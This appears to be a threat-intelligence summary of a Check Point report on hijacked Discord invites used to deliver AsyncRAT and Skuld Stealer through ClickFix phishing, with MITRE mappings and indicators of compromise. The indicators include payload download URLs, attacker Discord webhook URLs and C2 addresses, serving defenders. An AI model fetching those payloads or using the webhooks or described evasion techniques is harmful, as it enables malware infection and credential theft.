Threat Research

From Trust to Threat: Hijacked Discord Invites Used for Multi-Stage Malware Delivery

Checkpoint
From Trust to Threat: Hijacked Discord Invites Used for Multi-Stage Malware Delivery
EXTRACT IOC
Check Point Research discovered a sophisticated malware campaign exploiting expired and deleted Discord invite links to hijack users and deliver payloads like AsyncRAT and a modified Skuld Stealer targeting cryptocurrency wallets. The attackers use multi-stage loaders, trusted cloud services, and evasion techniques, including ChromeKatz, to steal data while maintaining stealth. #AsyncRAT #SkuldStealer #DiscordInviteHijacking #ChromeKatz

Keypoints

  • Expired and deleted Discord invite links can be hijacked by attackers through vanity link registration, redirecting users to malicious Discord servers.
  • The campaign uses a multi-stage infection chain starting with a phishing technique called ClickFix, leading to PowerShell downloaders that fetch payloads from GitHub, Bitbucket, and Pastebin.
  • Delivered payloads include AsyncRAT, a remote access Trojan, and a customized version of Skuld Stealer targeting browser credentials and cryptocurrency wallets such as Exodus and Atomic.
  • Skuld Stealer uses Discord webhooks to exfiltrate stolen data, including injecting malicious JavaScript into cryptocurrency wallet applications to steal seed phrases and passwords.
  • The campaign employs sandbox evasion techniques, delayed execution via scheduled tasks, and XOR-based payload encryption to avoid detection.
  • Attackers adapted ChromeKatz to bypass Chrome’s Application-Bound Encryption (ABE) in newer Chromium browsers to steal cookies directly from browser memory.
  • Another related campaign targets gamers of The Sims 4 using a Trojanized hacktool distributed via Bitbucket, using the same loader and payloads.

MITRE Techniques

  • [T1566] Phishing – Attackers use hijacked Discord invite links combined with a ClickFix phishing technique to deceive users into executing malicious PowerShell commands (‘ClickFix phishing technique, a fake Google CAPTCHA… prompting the user to open Windows Run dialog and execute a command’).
  • [T1204] User Execution – Social engineering is employed to trick victims to run a malicious PowerShell command that downloads malware (‘Clicking “Verify” silently copies a malicious PowerShell command to the clipboard’).
  • [T1041] Exfiltration Over C2 Channel – Skuld Stealer exfiltrates collected data via Discord webhooks, a one-way communication method used as command and control (‘Skuld sends collected data through a Discord webhook…’).
  • [T1053] Scheduled Task/Job – Persistence and delayed execution are ensured by scheduled tasks that run malicious scripts every five minutes (‘Scheduled task named checker runs the second script runsys.vbs every 5 minutes’).
  • [T1105] Ingress Tool Transfer – Downloaders retrieve payloads from trusted cloud services like GitHub, Bitbucket, and Pastebin (‘Downloads payloads using URLs from Bitbucket, GitHub, and Pastebin’).
  • [T1027] Obfuscated Files or Information – Malware strings and API calls are obfuscated using XOR encryption and junk code to evade static analysis (‘Critical strings related to malicious functionality are concealed using XOR cipher and junk code’).
  • [T1218] Signed Binary Proxy Execution – Use of PowerShell and Windows scripting for execution of payloads stealthily (‘PowerShell script downloads and executes malicious binaries with hidden console window’).
  • [T1557] Man-in-the-Middle – HTTPS redirection and OAuth2 flows are leveraged for capturing user credentials in a phishing website mimicking Discord (‘Phishing website uses OAuth2 authentication to get user data and display fake verification’).
  • [T1056] Input Capture – Skuld Stealer intercepts Discord tokens and browser credentials, as well as cryptocurrency wallet input (‘Discord injection module intercepts sensitive user operations such as login, password changes’).
  • [T1083] File and Directory Discovery – Malware discovers browser versions and paths for injecting code and stealing data (‘Stealer determines the browser version using GetFileVersionInfoW for injection targeting’).
  • [T1113] Screen Capture – AsyncRAT features include screen capturing capabilities (‘AsyncRAT provides keylogging and screen capturing functionality’).
  • [T1624] Hide Artifacts – Malware adds exclusion paths to Windows Defender to evade detection (‘nat1.vbs script adds user directory to Defender exclusion paths’).

Indicators of Compromise

  • [SHA256 Hash] Malware samples – 673090abada8ca47419a5dbc37c5443fe990973613981ce622f30e83683dc932 (First Stage Downloader), 160eda7ad14610d93f28b7dee20501028c1a9d4f5dc0437794ccfc2604807693 (Downloader Newer Variant), 53b65b7c38e3d3fca465c547a8c1acc53c8723877c6884f8c3495ff8ccc94fbe (AsyncRAT payload), 8135f126764592be3df17200f49140bfb546ec1b2c34a153aa509465406cb46c (Skuld Stealer payload), f08676eeb489087bc0e47bd08a3f7c4b57ef5941698bc09d30857c650763859c (ChromeKatz payload).
  • [Domains] Phishing and malware hosting – captchaguard[.]me (phishing site), pastebin[.]com/raw/zW0L2z2M (PowerShell script), github[.]com/frfs1/update/raw/refs/heads/main/installer.exe (downloader), bitbucket[.]org/syscontrol6/syscontrol/downloads/skul.exe (Skuld stealer).
  • [Discord Webhooks] Data exfiltration – https://discord[.]com/api/webhooks/1355186248578502736/RDywhK6GQKXiM5T05ueXSSjYopg9nY6XFJo1o5Jnz6v9sih59A8p-6HkndInOTicO, https://discord[.]com/api/webhooks/1348629600560742462/RJgSAE7cYY-1eKMkl5EI-qZMuHaujnRBMVU8zcIaMKyQi4mCVjc9R0zhDQ7wmPoD7Xp.
  • [IP Addresses] C2 Servers – 101.99.76.120:7707, 87.120.127.37:7707, 185.234.247.8:7707.

Read more: https://research.checkpoint.com/2025/from-trust-to-threat-hijacked-discord-invites-used-for-multi-stage-malware-delivery/

Views: 22

Tags: CLOUD, EXPLOIT, FINANCIAL, PERSISTENCE, PROXY, SOCIAL MEDIA, TOOL, WINDOWS